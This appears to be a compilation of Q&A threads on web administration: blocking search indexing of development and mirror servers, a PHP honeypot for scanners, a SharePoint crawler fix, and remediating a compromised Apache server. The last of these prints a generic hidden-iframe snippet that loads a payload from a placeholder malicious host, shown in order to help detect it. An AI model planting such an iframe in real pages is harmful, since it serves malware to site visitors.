How to avoid Google indexing my site until development is completed - seo

I have a new site on a new domain. Development will take about 2 months, and only then will the site go live. Only then do I want Google to start crawling and indexing my site.
So the question is: how do I "shut off" Google indexing for these 2 months before going live?
Right now I plan to use this index.html:
<html>
<head>
<meta name="googlebot" content="noindex">
</head>
<body>
UNDER CONSTRUCTION
</body>
</html>
I will do the development in index.php; when it is done I will remove index.html, and Googlebot will then start indexing, beginning with index.php.
I don't know if this is a good plan.

You can create a robots.txt file in your site's root directory and add the following to it:
User-agent: *
Disallow: /
When a bot reaches your site it first checks the robots.txt file, and if your pages are disallowed there it will not crawl them.
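One caveat worth knowing: robots.txt stops well-behaved crawlers from fetching your pages, but a URL blocked this way can still appear in search results if other sites link to it, while the noindex meta tag only works if the crawler is allowed to fetch the page and see it, so don't combine a blanket Disallow with meta noindex and expect both to apply. If you want a single switch that covers every file type (including index.php later on) without editing any HTML, you can also send the same signal as an HTTP header from Apache. A minimal .htaccess sketch, assuming mod_headers is enabled:

Header set X-Robots-Tag "noindex, nofollow"

Remove that line (and the robots.txt Disallow) when you go live.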

Related

How to stop automated scanners from scanning the website? Leaving aside robots.txt, can any other configuration be made?

Does anyone know how to stop automated scanners from scanning a web application or website?
Leaving aside robots.txt, is there any other configuration that can be made? Any server-side modification?
You can add a /robots.txt file that asks scanners nicely not to scan all or parts of your site. Most legitimate search engine robots follow the instructions you put in robots.txt.
For example:
User-agent: *
Disallow: /api/
If you want to be more fancy pants, you can add an HTTP GET handler on /api/ that normal browsers will never access. Your application HTML may access /api/customers and /api/suppliers, but never /api/ itself, for example.
When an automated scanner requests /api/, you can reject any further requests from that IP for 10 minutes. It may help a little.
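A rough sketch of that idea in PHP, assuming Apache routes bare /api/ requests to this script; the file location, names, and timings here are illustrative, not a standard:

<?php
// Honeypot for /api/: real browsers never request this URL directly.
// Hitting it records the caller's IP; check_ban() can be included at
// the top of real pages to reject recently banned IPs.

const BAN_FILE    = '/tmp/scanner_bans.json'; // illustrative path
const BAN_SECONDS = 600;                      // ban window: 10 minutes

function load_bans(): array {
    $raw = @file_get_contents(BAN_FILE);
    return $raw === false ? [] : (json_decode($raw, true) ?: []);
}

function record_ban(): void {
    $bans = load_bans();
    $bans[$_SERVER['REMOTE_ADDR']] = time(); // remember when this IP tripped the wire
    file_put_contents(BAN_FILE, json_encode($bans), LOCK_EX);
}

// Include and call this from real pages.
function check_ban(): void {
    $seen = load_bans()[$_SERVER['REMOTE_ADDR']] ?? 0;
    if (time() - $seen < BAN_SECONDS) {
        http_response_code(403); // still inside the ban window
        exit;
    }
}

record_ban();
http_response_code(404); // look like nothing is here

In production you would add locking around the read-modify-write and a whitelist for crawlers you actually want, but that is the shape of the trick.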
A Web Application Firewall like OWASP ModSecurity may also help.

Test my website online

How can I test my website online (before it is public) so that no one can see it except me?
I know I can add a password, but I don't want Google to index it (before it's really public).
To prevent Google from indexing it, use this meta tag inside your <head>:
<meta name="robots" content="noindex,nofollow" />
This tells search engines you do not wish for your page to show up in the search results.
Add a robots.txt file to your website.
User-agent: *
Disallow: /
Save the text above into a text file called robots.txt, and upload it to your website root.
By using this, any well-behaved crawler will not read your website, and any well-behaved search engine will not index it.
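If you decide you want the password after all, HTTP Basic Auth in Apache keeps out people and crawlers alike, and search engines never see what sits behind it. A minimal .htaccess sketch, assuming mod_auth_basic and a password file path of your choosing:

AuthType Basic
AuthName "Private development site"
AuthUserFile /home/you/.htpasswd
Require valid-user

Create the password file once with htpasswd -c /home/you/.htpasswd yourname, then remove these lines when you launch.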
Depending on how your website is built (PHP, Python, Ruby), you will have to set up a web server. The most typical configuration is AMP, which stands for Apache, MySQL, and PHP/Python. (Typically this runs atop Linux, making it LAMP, but it can be run under Windows too.)
Ruby on Rails comes with its own built-in web server. Most Python web frameworks (Django, CherryPy, Pylons) do too.
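As an aside, if the site is plain PHP you can preview it locally without configuring Apache at all, using the development server built into PHP 5.4 and later:

php -S localhost:8000

That serves the current directory at http://localhost:8000 and, being bound to localhost, is visible only from your own machine.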

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I have discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I have found out that the way he does that is by getting Apache (?) to replace every instance of
</body>
by
<iframe link to malware></iframe></body>
For example, if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I have immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder has changed on the server to perform the attack. I presume he has modified an Apache config file, but I have no idea which one. In particular, I have looked for recently modified files by time-stamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the meantime I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. This is a fairly standard drive-by attack against Apache that you can, ideally, resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups). But let's presume you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a
different website and/or load badware from another source. These
scripts will often be injected by an attacker into the content of your
web pages, or sometimes into other files on your server, such as
images and PDFs. Sometimes, instead of injecting the entire script
into your web pages, the attacker will only inject a pointer to a .js
or other file that the attacker saves in a directory on your web
server.
Many malicious scripts use obfuscation to make them more difficult for
anti-virus scanners to detect, and some use names that look like
they're coming from legitimate sites (for example, deliberate
misspellings of "analytics").
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a
hidden server file called .htaccess to configure certain access
settings for directories on the website. Attackers will sometimes
modify an existing .htaccess file on your web server or upload new
.htaccess files to your web server containing instructions to redirect
users to other websites, often ones that lead to badware downloads or
fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another
page or site. Attackers will often inject malicious iframes into a web
page or other file on your server. Often, these iframes will be
configured so they don’t show up on the web page when someone visits
the page, but the malicious content they are loading will still load,
hidden from the visitor’s view.
How to look for it
If your site was reported as a badware site by Google, you can use
Google’s Webmaster Tools to get more information about what was
detected. This includes a sampling of pages on which the badware was
detected and, using a Labs feature, possibly even a sample of the bad
code that was found on your site. Certain information can also be
found on the Google Diagnostics page, which can be found by replacing
example.com in the following URL with your own site’s URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There exist several free and paid website scanning services on the
Internet that can help you zero in on specific badware on your site.
There are also tools that you can use on your web server and/or on a
downloaded copy of the files from your website to search for specific
text. StopBadware does not list or recommend such services, but the
volunteers in our online community will be glad to point you to their
favorites.
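For context, the hidden iframes described above typically look something like this (a generic illustration with a placeholder URL, not the actual payload from the compromised server):

<iframe src="http://malicious.example/payload" width="1" height="1" style="visibility:hidden"></iframe>

The 1x1 size and hidden visibility keep it invisible to the visitor while the browser still fetches and executes the remote content.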
In short, use the stock-standard tools and scanners provided by Google first. If the threat can't otherwise be identified, you'll need to work back through the code of your CMS, your Apache configuration, your SQL setup, and the remaining content of your website to determine where you were compromised and what the right remediation steps are.
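Concretely, a few generic searches make a reasonable starting point on the box itself (a sketch assuming a Debian-style layout; adjust paths for your distribution):

# look for the injected string in content and configuration
grep -ri "iframe" /var/www /etc/apache2
# list every module Apache actually loads; an attacker-added filter
# module rewriting </body> on the fly would show up here
apachectl -M
# verify installed Apache package files against their checksums
debsums -c apache2 apache2-bin

Since your injection happens at serve time rather than in the files on disk, pay particular attention to the loaded-module list and to any output filters (mod_substitute, mod_ext_filter) configured in Apache.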
Best of luck handling your issue!

FAST Search for Sharepoint Crawler issue with Dokuwiki pages

My level of frustration is maxing out over crawling DokuWiki sites.
I have a content source using FAST Search for SharePoint that I have set up to crawl a dokuwiki/doku.php site. My crawler rules are set to http://servername/*, match case, include all items in this path, with "crawl complex URLs" enabled. Testing the content source against the crawl rules shows that it will be crawled. However, the crawl always lasts under 2 minutes and completes having crawled only the page I pointed it at and none of the other links on that page. I have checked with the DokuWiki admin, and he has robots set to allow. When I look at the source of the pages, I see that it says
<meta name="robots" content="index,follow">
So, to test whether the other linked pages were the problem, I added those links to the content source manually and recrawled. For example, the source page has three links:
site A
site B
site C
I added the site A, B, and C URLs to the crawl source. The results of this crawl are 4 successes: the primary source page and the three links A, B, and C that I added manually.
So my question is: why won't the crawler follow the links on the page? Is this something I need to fix with the crawler on my end, or does it have to do with how namespaces are defined and links are constructed in DokuWiki?
Any help would be appreciated
Eric
Did you disable the delayed indexing options and rel=nofollow options?
The issue was around authentication, even though nothing in the FAST crawl logs suggested that authentication was the problem.
The fix was adding a $freepass setting for the IP address of the search indexing server, so that Apache would not go through the authentication process for each page hit.
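For anyone hitting the same wall, the Apache side of that kind of IP exemption typically looks like the following (a sketch in Apache 2.2 syntax with a placeholder indexer IP; the $freepass setting itself is specific to this site's DokuWiki setup):

<Directory /var/www/dokuwiki>
    AuthType Basic
    AuthName "Wiki"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
    Order deny,allow
    Deny from all
    Allow from 192.0.2.10
    Satisfy Any
</Directory>

Satisfy Any admits a request that passes either the IP allow rule or Basic Auth, so the indexer at 192.0.2.10 skips the login prompt while everyone else still authenticates.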
Thanks for the reply
Eric

Stop Google from Indexing files from our second server

I've been scouring the web for the right terms for this question, but after a few hours I decided to post it here.
The scenario is:
we have a website running on two servers, so the files/website are synchronized between the two. The second server is for internal purposes. Let's call the first server www and the second ww2. ww2 is automatically updated whenever the files are updated on www.
Now, Google is indexing ww2, which I want to stop; only www should be crawled and indexed. My questions are:
1. How can I get the pages already crawled on ww2 removed from Google's index?
2. How can I stop Google from indexing ww2?
Thanks guys!
You can simply use robots.txt to disallow indexing, and there is a robots meta tag obeyed by Google.
For your first question, Google has a removal tool in their Webmaster Tools; for more information, see "Remove page or site from Google's search results".
For the second question, you can either use a robots.txt file to block Google from crawling your site (for more information, see "Blocking Google") or restrict access to that server.
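One wrinkle: since the files are synchronized, a disallow-all robots.txt dropped on ww2 would be copied to www as well. A way around that is to serve a different robots.txt per hostname; a sketch using Apache mod_rewrite in the shared .htaccess, assuming hostnames like www.example.com and ww2.example.com (placeholders for the real names):

RewriteEngine On
RewriteCond %{HTTP_HOST} ^ww2\. [NC]
RewriteRule ^robots\.txt$ /robots-staging.txt [L]

robots-staging.txt then carries the User-agent: * / Disallow: / rules while the normal robots.txt stays open, and because the rule keys on the hostname it is safe to let it sync to both servers.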